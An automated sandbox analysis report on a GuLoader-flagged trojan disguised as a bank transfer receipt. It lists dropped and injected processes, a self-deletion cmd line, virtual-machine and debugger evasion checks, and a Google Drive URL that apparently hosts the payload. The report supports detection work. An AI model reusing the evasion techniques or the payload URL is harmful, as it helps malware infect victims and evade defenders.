Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Process created: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe
Source: C:\Windows\explorer.exe	Process created: C:\Windows\SysWOW64\svchost.exe C:\Windows\SysWOW64\svchost.exe
Source: C:\Windows\SysWOW64\svchost.exe	Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Bank_Transfer_Receipt_Copy_Scan#342 (5).exe	Process created: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Process created: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe"	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32

Jump to behavior

Source: C:\Users\user\Desktop\Bank_Transfer_Receipt_Copy_Scan#342 (5).exe

Code function: 0_2_00F31DC7 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,CloseHandle,ExitWindowsEx,ExitWindowsEx,

0_2_00F31DC7

Source: C:\Users\user\Desktop\Bank_Transfer_Receipt_Copy_Scan#342 (5).exe

File created: C:\Users\user\AppData\Local\Temp\IXP000.TMP

Jump to behavior

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@10/1@2/2

Source: C:\Users\user\Desktop\Bank_Transfer_Receipt_Copy_Scan#342 (5).exe

Code function: 0_2_00F35849 GetCurrentDirectoryA,SetCurrentDirectoryA,GetDiskFreeSpaceA,MulDiv,GetVolumeInformationA,memset,GetLastError,FormatMessageA,SetCurrentDirectoryA,memset,GetLastError,FormatMessageA,SetCurrentDirectoryA,

0_2_00F35849

Source: C:\Users\user\Desktop\Bank_Transfer_Receipt_Copy_Scan#342 (5).exe

Code function: 0_2_00F33E45 CreateProcessA,WaitForSingleObject,GetExitCodeProcess,CloseHandle,CloseHandle,GetLastError,FormatMessageA,

0_2_00F33E45

Source: unknown

Process created: C:\Windows\System32\rundll32.exe C:\Windows\system32\rundll32.exe" C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\user\AppData\Local\Temp\IXP000.TMP\

Source: C:\Windows\System32\conhost.exe

Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4456:120:WilError_01

Source: C:\Users\user\Desktop\Bank_Transfer_Receipt_Copy_Scan#342 (5).exe

Code function: 0_2_00F34E80 FindResourceA,LoadResource,LockResource,GetDlgItem,ShowWindow,GetDlgItem,ShowWindow,#20,#22,#23,FreeResource,SendMessageA,

0_2_00F34E80

Source: C:\Users\user\Desktop\Bank_Transfer_Receipt_Copy_Scan#342 (5).exe

Command line argument: Kernel32.dll

0_2_00F32A7E

Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior

Source: Bank_Transfer_Receipt_Copy_Scan#342 (5).exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: Bank_Transfer_Receipt_Copy_Scan#342 (5).exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: Bank_Transfer_Receipt_Copy_Scan#342 (5).exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: Bank_Transfer_Receipt_Copy_Scan#342 (5).exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Bank_Transfer_Receipt_Copy_Scan#342 (5).exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: Bank_Transfer_Receipt_Copy_Scan#342 (5).exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT

Source: Bank_Transfer_Receipt_Copy_Scan#342 (5).exe

Static PE information: GUARD_CF, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT

Source: Bank_Transfer_Receipt_Copy_Scan#342 (5).exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: wextract.pdb source: Bank_Transfer_Receipt_Copy_Scan#342 (5).exe
Source:	Binary string: wntdll.pdbUGP source: nongrav.exe, 0000000F.00000002.790554216.000000001EBBF000.00000040.00000001.sdmp, nongrav.exe, 0000000F.00000002.790351865.000000001EAA0000.00000040.00000001.sdmp, svchost.exe, 00000016.00000002.821268694.0000000003A00000.00000040.00000001.sdmp, svchost.exe, 00000016.00000003.788029496.0000000003800000.00000004.00000001.sdmp, svchost.exe, 00000016.00000002.821623661.0000000003B1F000.00000040.00000001.sdmp, svchost.exe, 00000016.00000003.786512054.0000000003600000.00000004.00000001.sdmp
Source:	Binary string: wntdll.pdb source: nongrav.exe, nongrav.exe, 0000000F.00000002.790554216.000000001EBBF000.00000040.00000001.sdmp, nongrav.exe, 0000000F.00000002.790351865.000000001EAA0000.00000040.00000001.sdmp, svchost.exe, svchost.exe, 00000016.00000002.821268694.0000000003A00000.00000040.00000001.sdmp, svchost.exe, 00000016.00000003.788029496.0000000003800000.00000004.00000001.sdmp, svchost.exe, 00000016.00000002.821623661.0000000003B1F000.00000040.00000001.sdmp, svchost.exe, 00000016.00000003.786512054.0000000003600000.00000004.00000001.sdmp
Source:	Binary string: wextract.pdbPp source: Bank_Transfer_Receipt_Copy_Scan#342 (5).exe
Source:	Binary string: svchost.pdb source: nongrav.exe, 0000000F.00000002.786712436.0000000000110000.00000040.00020000.sdmp, nongrav.exe, 0000000F.00000003.785460105.0000000000756000.00000004.00000001.sdmp
Source:	Binary string: svchost.pdbUGP source: nongrav.exe, 0000000F.00000002.786712436.0000000000110000.00000040.00020000.sdmp, nongrav.exe, 0000000F.00000003.785460105.0000000000756000.00000004.00000001.sdmp

Data Obfuscation:

Detected unpacking (changes PE section rights)

Show sources

Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe

Unpacked PE file: 15.2.nongrav.exe.400000.1.unpack .text:ER;.data:W;.rsrc:R; vs .text:ER;

Yara detected GuLoader

Show sources

Source: Yara match	File source: 00000001.00000002.507414765.000000000067A000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.507792110.0000000002AA0000.00000040.00000001.sdmp, type: MEMORY

Source: C:\Users\user\Desktop\Bank_Transfer_Receipt_Copy_Scan#342 (5).exe	Code function: 0_2_00F378A1 push ecx; ret	0_2_00F378B4
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 1_2_00405A42 pushad ; iretd	1_2_00405A43
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 1_2_00407418 push esp; ret	1_2_00407419
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 1_2_02AA00C5 push 0000001Ch; ret	1_2_02AA00C7
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 1_2_02AA306C pushfd ; ret	1_2_02AA3073
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 1_2_02AA0043 push 0000001Ch; ret	1_2_02AA0045
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 1_2_02AA23A8 pushfd ; iretd	1_2_02AA23B8
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 1_2_02AA3993 push ebp; retf	1_2_02AA3A08
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 1_2_02AA3397 push eax; retf FA42h	1_2_02AA3493
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 1_2_02AA1339 push cs; retf	1_2_02AA133A
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 15_2_1EB1D0D1 push ecx; ret	15_2_1EB1D0E4
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 15_2_00527C89 push es; ret	15_2_00527C8B
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 15_1_00405A42 pushad ; iretd	15_1_00405A43
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 15_1_00407418 push esp; ret	15_1_00407419
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 15_1_004015E0 push 0051A000h; ret	15_1_004015E5
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 22_2_03A7D0D1 push ecx; ret	22_2_03A7D0E4
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 22_2_02D3B87C push eax; ret	22_2_02D3B882
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 22_2_02D3B812 push eax; ret	22_2_02D3B818
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 22_2_02D3B81B push eax; ret	22_2_02D3B882
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 22_2_02D3514C push eax; iretd	22_2_02D35156
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 22_2_02D34E06 push EEE5C1DBh; ret	22_2_02D34E0B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 22_2_02D3B7C5 push eax; ret	22_2_02D3B818
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 22_2_02D35F04 push ecx; ret	22_2_02D35F0F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 22_2_02D2CCA8 push edi; ret	22_2_02D2CCF9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 22_2_02D34405 pushfd ; retf	22_2_02D34406

Source: C:\Users\user\Desktop\Bank_Transfer_Receipt_Copy_Scan#342 (5).exe

Code function: 0_2_00F32DAE GetSystemDirectoryA,LoadLibraryA,GetProcAddress,DecryptFileA,FreeLibrary,SetCurrentDirectoryA,

0_2_00F32DAE

Source: initial sample

Static PE information: section name: .text entropy: 7.15232961918

Source: C:\Users\user\Desktop\Bank_Transfer_Receipt_Copy_Scan#342 (5).exe

File created: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe

Jump to dropped file

Source: C:\Users\user\Desktop\Bank_Transfer_Receipt_Copy_Scan#342 (5).exe

Code function: 0_2_00F31910 CompareStringA,GetFileAttributesA,LocalAlloc,GetPrivateProfileIntA,GetPrivateProfileStringA,GetShortPathNameA,CompareStringA,LocalAlloc,LocalAlloc,GetFileAttributesA,

0_2_00F31910

Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion:

Tries to detect Any.run

Show sources

Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	File opened: C:\Program Files\Qemu-ga\qemu-ga.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	File opened: C:\Program Files\qga\qga.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	File opened: C:\Program Files\Qemu-ga\qemu-ga.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	File opened: C:\Program Files\qga\qga.exe	Jump to behavior

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Show sources

Source: nongrav.exe, 00000001.00000002.507816361.0000000002AF0000.00000004.00000001.sdmp	Binary or memory string: NTDLLKERNEL32USER32C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXEC:\PROGRAM FILES\QGA\QGA.EXEPSAPI.DLLMSI.DLLPUBLISHERWININET.DLLMOZILLA/5.0 (WINDOWS NT 6.1; WOW64; TRIDENT/7.0; RV:11.0) LIKE GECKOSHELL32ADVAPI32TEMP=
Source: nongrav.exe, 0000000F.00000002.787076443.00000000028E0000.00000004.00000001.sdmp	Binary or memory string: NTDLLKERNEL32USER32C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXEC:\PROGRAM FILES\QGA\QGA.EXEPSAPI.DLLMSI.DLLPUBLISHERWININET.DLLMOZILLA/5.0 (WINDOWS NT 6.1; WOW64; TRIDENT/7.0; RV:11.0) LIKE GECKOSHELL32ADVAPI32TEMP=HTTPS://DRIVE.GOOGLE.COM/UC?EXPORT=DOWNLOAD&ID=1PQ36FQ9YGHZAM_FHR1D0IRFRVEBW3FSZ
Source: nongrav.exe, 00000001.00000002.507816361.0000000002AF0000.00000004.00000001.sdmp, nongrav.exe, 0000000F.00000002.787076443.00000000028E0000.00000004.00000001.sdmp	Binary or memory string: C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXE
Source: nongrav.exe, 00000001.00000002.507462728.00000000006DC000.00000004.00000020.sdmp	Binary or memory string: C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXEOWS

Tries to detect virtualization through RDTSC time measurements

Show sources

Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	RDTSC instruction interceptor: First address: 0000000000408604 second address: 000000000040860A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	RDTSC instruction interceptor: First address: 000000000040898E second address: 0000000000408994 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\svchost.exe	RDTSC instruction interceptor: First address: 0000000002D28604 second address: 0000000002D2860A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\svchost.exe	RDTSC instruction interceptor: First address: 0000000002D2898E second address: 0000000002D28994 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc

Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe TID: 6996

Thread sleep count: 581 > 30

Jump to behavior

Source: C:\Windows\SysWOW64\svchost.exe

Last function: Thread delayed

Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe

Code function: 15_2_004088C0 rdtsc

15_2_004088C0

Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe

Window / User API: threadDelayed 581

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\Bank_Transfer_Receipt_Copy_Scan#342 (5).exe

Code function: 0_2_00F3532F GetSystemInfo,CreateDirectoryA,RemoveDirectoryA,

0_2_00F3532F

Source: C:\Users\user\Desktop\Bank_Transfer_Receipt_Copy_Scan#342 (5).exe

Code function: 0_2_00F321E7 FindFirstFileA,lstrcmpA,lstrcmpA,SetFileAttributesA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,

0_2_00F321E7

Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe

System information queried: ModuleInformation

Jump to behavior

Source: nongrav.exe, 00000001.00000002.507837199.0000000002BBA000.00000004.00000001.sdmp, nongrav.exe, 0000000F.00000002.787120391.0000000002A5A000.00000004.00000001.sdmp	Binary or memory string: Hyper-V Guest Shutdown Service
Source: nongrav.exe, 00000001.00000002.507816361.0000000002AF0000.00000004.00000001.sdmp	Binary or memory string: ntdllkernel32user32C:\Program Files\Qemu-ga\qemu-ga.exeC:\Program Files\qga\qga.exepsapi.dllMsi.dllPublisherwininet.dllMozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Geckoshell32advapi32TEMP=
Source: nongrav.exe, 00000001.00000002.507462728.00000000006DC000.00000004.00000020.sdmp	Binary or memory string: C:\Program Files\Qemu-ga\qemu-ga.exeows
Source: explorer.exe, 00000015.00000000.735601007.000000000EEA7000.00000004.00000001.sdmp	Binary or memory string: Prod_VMware_SATA
Source: nongrav.exe, 00000001.00000002.507837199.0000000002BBA000.00000004.00000001.sdmp, nongrav.exe, 0000000F.00000002.787120391.0000000002A5A000.00000004.00000001.sdmp	Binary or memory string: Hyper-V Remote Desktop Virtualization Service
Source: nongrav.exe, 0000000F.00000002.787076443.00000000028E0000.00000004.00000001.sdmp	Binary or memory string: ntdllkernel32user32C:\Program Files\Qemu-ga\qemu-ga.exeC:\Program Files\qga\qga.exepsapi.dllMsi.dllPublisherwininet.dllMozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Geckoshell32advapi32TEMP=https://drive.google.com/uc?export=download&id=1Pq36Fq9yGHzam_FHR1D0IrFRVEBW3FSZ
Source: explorer.exe, 00000015.00000000.733803262.00000000086C9000.00000004.00000001.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: nongrav.exe, 0000000F.00000002.787120391.0000000002A5A000.00000004.00000001.sdmp	Binary or memory string: vmicshutdown
Source: nongrav.exe, 00000001.00000002.507837199.0000000002BBA000.00000004.00000001.sdmp, nongrav.exe, 0000000F.00000002.787120391.0000000002A5A000.00000004.00000001.sdmp	Binary or memory string: Hyper-V Volume Shadow Copy Requestor
Source: explorer.exe, 00000015.00000000.733926654.0000000008778000.00000004.00000001.sdmp	Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000}
Source: explorer.exe, 00000015.00000000.733803262.00000000086C9000.00000004.00000001.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}&
Source: explorer.exe, 00000015.00000000.729770363.00000000067C2000.00000004.00000001.sdmp	Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: nongrav.exe, 00000001.00000002.507837199.0000000002BBA000.00000004.00000001.sdmp, nongrav.exe, 0000000F.00000002.787120391.0000000002A5A000.00000004.00000001.sdmp	Binary or memory string: Hyper-V PowerShell Direct Service
Source: nongrav.exe, 00000001.00000002.507837199.0000000002BBA000.00000004.00000001.sdmp, nongrav.exe, 0000000F.00000002.787120391.0000000002A5A000.00000004.00000001.sdmp	Binary or memory string: Hyper-V Time Synchronization Service
Source: nongrav.exe, 0000000F.00000002.787120391.0000000002A5A000.00000004.00000001.sdmp	Binary or memory string: vmicvss
Source: explorer.exe, 00000015.00000000.729770363.00000000067C2000.00000004.00000001.sdmp	Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000m32)
Source: nongrav.exe, 00000001.00000002.507816361.0000000002AF0000.00000004.00000001.sdmp, nongrav.exe, 0000000F.00000002.787076443.00000000028E0000.00000004.00000001.sdmp	Binary or memory string: C:\Program Files\Qemu-ga\qemu-ga.exe
Source: nongrav.exe, 00000001.00000002.507837199.0000000002BBA000.00000004.00000001.sdmp, nongrav.exe, 0000000F.00000002.787120391.0000000002A5A000.00000004.00000001.sdmp	Binary or memory string: Hyper-V Data Exchange Service
Source: nongrav.exe, 00000001.00000002.507837199.0000000002BBA000.00000004.00000001.sdmp, nongrav.exe, 0000000F.00000002.787120391.0000000002A5A000.00000004.00000001.sdmp	Binary or memory string: Hyper-V Heartbeat Service
Source: nongrav.exe, 00000001.00000002.507837199.0000000002BBA000.00000004.00000001.sdmp, nongrav.exe, 0000000F.00000002.787120391.0000000002A5A000.00000004.00000001.sdmp	Binary or memory string: Hyper-V Guest Service Interface
Source: explorer.exe, 00000015.00000000.733803262.00000000086C9000.00000004.00000001.sdmp	Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000
Source: nongrav.exe, 0000000F.00000002.787120391.0000000002A5A000.00000004.00000001.sdmp	Binary or memory string: vmicheartbeat

Anti Debugging:

Hides threads from debuggers

Show sources

Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Thread information set: HideFromDebugger			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Thread information set: HideFromDebugger			Jump to behavior

Source: C:\Users\user\Desktop\Bank_Transfer_Receipt_Copy_Scan#342 (5).exe

Code function: 0_2_00F32DAE GetSystemDirectoryA,LoadLibraryA,GetProcAddress,DecryptFileA,FreeLibrary,SetCurrentDirectoryA,

0_2_00F32DAE

Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe

Code function: 15_2_004088C0 rdtsc

15_2_004088C0

Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe

Process token adjusted: Debug

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 1_2_02AA8E06 mov eax, dword ptr fs:[00000030h]	1_2_02AA8E06
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 1_2_02AAB126 mov eax, dword ptr fs:[00000030h]	1_2_02AAB126
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 1_2_02AAC112 mov eax, dword ptr fs:[00000030h]	1_2_02AAC112
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 1_2_02AAAB56 mov eax, dword ptr fs:[00000030h]	1_2_02AAAB56
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 15_2_1EAC52A5 mov eax, dword ptr fs:[00000030h]	15_2_1EAC52A5
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 15_2_1EAC52A5 mov eax, dword ptr fs:[00000030h]	15_2_1EAC52A5
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 15_2_1EAC52A5 mov eax, dword ptr fs:[00000030h]	15_2_1EAC52A5
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 15_2_1EAC52A5 mov eax, dword ptr fs:[00000030h]	15_2_1EAC52A5
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 15_2_1EAC52A5 mov eax, dword ptr fs:[00000030h]	15_2_1EAC52A5
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 15_2_1EB446A7 mov eax, dword ptr fs:[00000030h]	15_2_1EB446A7
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 15_2_1EB90EA5 mov eax, dword ptr fs:[00000030h]	15_2_1EB90EA5
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 15_2_1EB90EA5 mov eax, dword ptr fs:[00000030h]	15_2_1EB90EA5
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 15_2_1EB90EA5 mov eax, dword ptr fs:[00000030h]	15_2_1EB90EA5
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 15_2_1EADAAB0 mov eax, dword ptr fs:[00000030h]	15_2_1EADAAB0
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 15_2_1EADAAB0 mov eax, dword ptr fs:[00000030h]	15_2_1EADAAB0
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 15_2_1EAFFAB0 mov eax, dword ptr fs:[00000030h]	15_2_1EAFFAB0
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 15_2_1EB5FE87 mov eax, dword ptr fs:[00000030h]	15_2_1EB5FE87
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 15_2_1EAFD294 mov eax, dword ptr fs:[00000030h]	15_2_1EAFD294
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 15_2_1EAFD294 mov eax, dword ptr fs:[00000030h]	15_2_1EAFD294
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 15_2_1EAF2AE4 mov eax, dword ptr fs:[00000030h]	15_2_1EAF2AE4
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 15_2_1EAF16E0 mov ecx, dword ptr fs:[00000030h]	15_2_1EAF16E0
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 15_2_1EAD76E2 mov eax, dword ptr fs:[00000030h]	15_2_1EAD76E2
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 15_2_1EAF36CC mov eax, dword ptr fs:[00000030h]	15_2_1EAF36CC
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 15_2_1EAF2ACB mov eax, dword ptr fs:[00000030h]	15_2_1EAF2ACB
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 15_2_1EB98ED6 mov eax, dword ptr fs:[00000030h]	15_2_1EB98ED6
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 15_2_1EB7FEC0 mov eax, dword ptr fs:[00000030h]	15_2_1EB7FEC0
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 15_2_1EB08EC7 mov eax, dword ptr fs:[00000030h]	15_2_1EB08EC7
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 15_2_1EB7FE3F mov eax, dword ptr fs:[00000030h]	15_2_1EB7FE3F
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 15_2_1EACE620 mov eax, dword ptr fs:[00000030h]	15_2_1EACE620
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 15_2_1EB04A2C mov eax, dword ptr fs:[00000030h]	15_2_1EB04A2C
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 15_2_1EB04A2C mov eax, dword ptr fs:[00000030h]	15_2_1EB04A2C
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 15_2_1EAD8A0A mov eax, dword ptr fs:[00000030h]	15_2_1EAD8A0A
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 15_2_1EACC600 mov eax, dword ptr fs:[00000030h]	15_2_1EACC600
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 15_2_1EACC600 mov eax, dword ptr fs:[00000030h]	15_2_1EACC600
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 15_2_1EACC600 mov eax, dword ptr fs:[00000030h]	15_2_1EACC600
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 15_2_1EAF8E00 mov eax, dword ptr fs:[00000030h]	15_2_1EAF8E00
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 15_2_1EB81608 mov eax, dword ptr fs:[00000030h]	15_2_1EB81608
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 15_2_1EAE3A1C mov eax, dword ptr fs:[00000030h]	15_2_1EAE3A1C
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 15_2_1EAFA61C mov eax, dword ptr fs:[00000030h]	15_2_1EAFA61C
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 15_2_1EAFA61C mov eax, dword ptr fs:[00000030h]	15_2_1EAFA61C
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 15_2_1EACAA16 mov eax, dword ptr fs:[00000030h]	15_2_1EACAA16
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 15_2_1EACAA16 mov eax, dword ptr fs:[00000030h]	15_2_1EACAA16
